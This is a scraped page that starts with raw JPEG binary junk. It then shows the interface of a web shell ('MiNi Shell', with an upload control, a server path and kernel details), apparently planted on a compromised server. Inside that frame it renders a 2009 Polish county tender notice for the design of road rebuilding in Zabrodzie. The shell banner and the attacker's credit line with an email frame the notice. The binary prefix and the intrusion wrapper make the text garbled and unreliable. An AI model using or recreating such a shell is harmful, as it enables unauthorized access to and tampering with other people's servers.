JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/221060-N-2009.html

<p class="kh_header"><b>Wyszków: Dokumentacja projektowa przebudowy dróg powiatowych Nr 1811W        ( dawniej 4319W ) i 4421W w ramach zadania pn. Budowa dróg powiatowych Nr 4319W, 4421W, 4420W na terenie gminy Zabrodzie</b><br>
<b>Numer ogłoszenia: 221060 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Wyszkowskiego , al. Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7420750, faks (029) 742 25 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-wyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja projektowa przebudowy dróg powiatowych Nr 1811W        ( dawniej 4319W ) i 4421W w ramach zadania pn. Budowa dróg powiatowych Nr 4319W, 4421W, 4420W na terenie gminy Zabrodzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot opracowania projektowego
Przedmiotem niniejszego zamówienia jest wykonanie Dokumentacji projektowej przebudowy dróg powiatowych Nr 1811W ( dawniej 4319W ) i 4421W w ramach zadania pn.  Budowa dróg powiatowych Nr 4319W, 4421W, 4420W na terenie gminy Zabrodzie.
Wspólny Słownik Zamówień (CPV) -  71.32.00.00.7 - usługi inżynieryjne w zakresie projektowania.
2. Zakres opracowania
Zakres dokumentacji projektowej i Specyfikacji Technicznej Wykonania i Odbioru Robót  przebudowy dróg powiatowych Nr 1811W ( dawniej 4319W ) i 4421W  obejmuje:
1) Przebudowę istniejącej jezdni o nawierzchni bitumicznej, wraz z niezbędnymi poszerzeniami.
2) Przebudowę istniejącego ciągu pieszego oraz budowę nowych ciągów pieszych (pieszo- jezdnych) na całej długości.
3) Przebudowę elementów odwodnienia powierzchniowego.
4) Remont istniejącego mostu z budową poszerzenia pod projektowane ciągi pieszo - jezdne.
5) Wycinkę drzew w zakresie niezbędnym dla realizacji inwestycji .
6) Wykonanie projektu stałej organizacji ruchu.
Uwaga:
Opracowanie projektowe powinno ograniczyć się do istniejącego pasa drogowego w jego szerokości wyznaczonej aktualnymi granicami ewidencyjnymi działki, na której znajduje się droga.
Wszelkie rozwiązania projektowe wymagające zmiany granic istniejącego pasa drogowego będą wymagały akceptacji Zamawiającego.  
3. Skład dokumentacji projektowej
W skład zamawianej dokumentacji projektowej dla przebudowy dróg powiatowych Nr 1811W ( dawniej 4319W ) i 4421W wchodzą następujące elementy: 
1) projekt koncepcyjny opracowany w zakresie drogowym, składający się z części graficznej i opisowej,
2) wykonanie odpowiednich map do celów projektowych,
3) projekt budowlano-wykonawczy obejmujący: przebudowę istniejącej jezdni o nawierzchni bitumicznej, przebudowę istniejącego ciągu pieszego i budowę ciągów pieszych pieszo-rowerowych oraz przebudowę istniejących elementów odwodnienia powierzchniowego rowów przydrożnych, przepustów,
4) projekt wykonawczy stałej organizacji ruchu, 
5) przedmiar robót sporządzony z podziałem na charakterystyczne etapy robót, z nazwami i kodem według wspólnego słownika zamówień (CPV) zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. Dz. U. nr 202 poz. 2072,
6) kosztorys inwestorski sporządzony z podziałem na charakterystyczne etapy robót - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku dz. U. Nr 130, poz. 1389,
7) Specyfikacje Techniczne Wykonania i Odbioru Robót, zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004r. Dz. U. z 2004r., Nr 202, poz. 2072,
8) wykonanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (bioz) zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 czerwca 2003 r. (Dz.U. Nr 120, poz. 1126),
9) oświadczenie o kompletności wykonanej dokumentacji oraz że jest zweryfikowana i posiada odpowiednie uzgodnienia,
10) karta informacyjna przedsięwzięcia o której mowa w art. 96 ust. 3 pkt 2 ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko z dnia 3 października 2008r. Dz.U. Nr 199, poz. 1227,
11) raport oceny oddziaływania na środowisko dla planowanego przedsięwzięcia inwestycyjnego (w przypadku, gdy właściwy organ nałoży obowiązek wykonania raportu).
Uwaga:
Dokumentacja stanowiąca przedmiot zamówienia powinna być wykonana przez osoby posiadające odpowiednie, wymagane przepisami, uprawnienia.
Opracowana dokumentacja powinna zawierać wszelkie niezbędne rozwiązania projektowe i uzgodnienia umożliwiające Zamawiającemu uzyskanie pozwolenia na budowę lub zgodę na wykonywanie robót budowlanych.
Wszelkie pomiary ruchu, ekspertyzy i badania niezbędne dla potrzeb opracowania projektowego Wykonawca wykona we własnym zakresie.
Przed wykonaniem ostatecznej dokumentacji projektowej Wykonawca przedstawi Zamawiającemu do uzgodnienia i zatwierdzenia:
- projekt koncepcyjny opracowany w zakresie drogowym - w 2 egz.,
- karta informacyjna przedsięwzięcia w 3 egz. +  wersja elektroniczna,
Na ostateczną dokumentację projektową składa się:
- projekt budowlano - wykonawczy ( techniczny) wraz ze wszystkimi wymaganymi uzgodnieniami - w 5 egzemplarzach, 
- specyfikacja techniczna wykonania i odbioru robót - w 2 egzemplarzach,
- przedmiary robót - w 2 egzemplarzach, 
- kosztorysy inwestorskie - w 2 egzemplarzach,
- raport oceny oddziaływania na środowisko - w 2 egz. + wersja elektroniczna,
- komplet dokumentacji projektowej w wersji elektronicznej w postaci plików odczytywanych  przez powszechnie stosowane programy - w 1 egzemplarzu.
4. Założenia do projektowania:
Drogi powiatowe nr 1811W i 4421W na odcinku objętym opracowaniem projektowym posiadają jezdnięo nawierzchni bitumicznej. 
W pasie drogowym dróg znajdują się sieci uzbrojenia technicznego:
- kanalizacja sanitarna,
- teletechniczna,
- wodociągowa,
- gazowa,
- energetyczna SN- napowietrzna
Niwelety przebudowywanej jezdni, chodników i ciągów pieszo-rowerowych należy w miarę możliwości dostosować do warunków istniejących.  
Zjazdy wysokościowo należy kształtować z zachowaniem spadku umożliwiającego wyprowadzenie wód z terenu posesji na jezdnię.  
Nawierzchnia jezdni z asfaltobetonu, konstrukcja jezdni odpowiednio do kategorii ruchu. Parametry techniczne jezdni: szerokość, profile podłużne i poprzeczne, odwodnienie odpowiednio do natężenia ruchu zgodnie z obowiązującymi przepisami.
Odprowadzenie wód opadowych do istniejących i nowoprojektowanych rowów przydrożnych.
Uwaga:
Przyjęte rozwiązania projektowe i zastosowane materiały powinny maksymalnie ograniczać koszty przyszłej inwestycji, jednocześnie jednak powinny być zgodne z obowiązującymi przepisami i zasadami wiedzy technicznej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział Oferenci, którzy:
a) posiadają uprawnienia do wykonywania działalności lub czynności odpowiadającym przedmiotowi zamówienia;
b) posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego w oparciu o art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu nastąpi poprzez analizę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, metodą spełnia - nie spełnia.
Wykaz dokumentów, na podstawie których zostanie dokonana ocena spełnienia warunków  udziału w postępowaniu zawiera rozdz. VI SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca wraz z ofertą składa następujące oświadczenia lub dokumenty:
1. Dokumenty wymagane:
1.1 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert*,
1.2 oświadczenie o spełnieniu warunków wynikających z art. 22 ust.1 ustawy Prawo zamówień publicznych -  załącznik Nr 2 do SIWZ,
1.3 wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, tj. osób i podmiotów odpowiedzialnych za realizację zamówienia wraz z danymi na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także z określeniem  zakresu wykonywanych przez nich czynności. (załącznik Nr 3 do SIWZ),
1.4 dokumenty stwierdzające, że osoby, które będą wykonywały projekt, posiadają wymagane uprawnienia projektowe w specjalności drogowej i w specjalnościach instalacyjnych w zakresie sieci objętych opracowaniem projektowym; wraz z aktualnymi zaświadczeniami poświadczającymi przynależność do okręgowej izby inżynierów budownictwa.
2. Wykonawca zamieszkały poza terenem Rzeczpospolitej Polskiej.
2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej zamiast dokumentów wymienionych w pkt 1.1.  niniejszego rozdziału, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub  miejsce zamieszkania potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie  orzeczono wobec niego zakazu ubiegania się o zamówienie, 
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne  i  zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.2.  Jeżeli w kraju pochodzenia osoby lub w kraju , w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2.1., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby  lub  kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
3. Dokumenty wymagane w przypadku składania oferty wspólnej.
W przypadku złożenia oferty przez konsorcjum / spółkę cywilną  warunki określone w rozdziale VI specyfikacji pkt. 1.3 muszą spełniać łącznie wszyscy uczestnicy konsorcjum / spółki cywilnej.
* dokumenty z tym znakiem winny być przedstawione przez każdego wykonawcę, w przypadku Wykonawców występujących wspólnie, na podstawie art. 23 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-wyszkowski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wyszkowie, Al. Róż 2, 07-200 Wyszków, pok. nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Wyszkowie, Al. Róż 2, 07-200 Wyszków, pok. nr 39.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com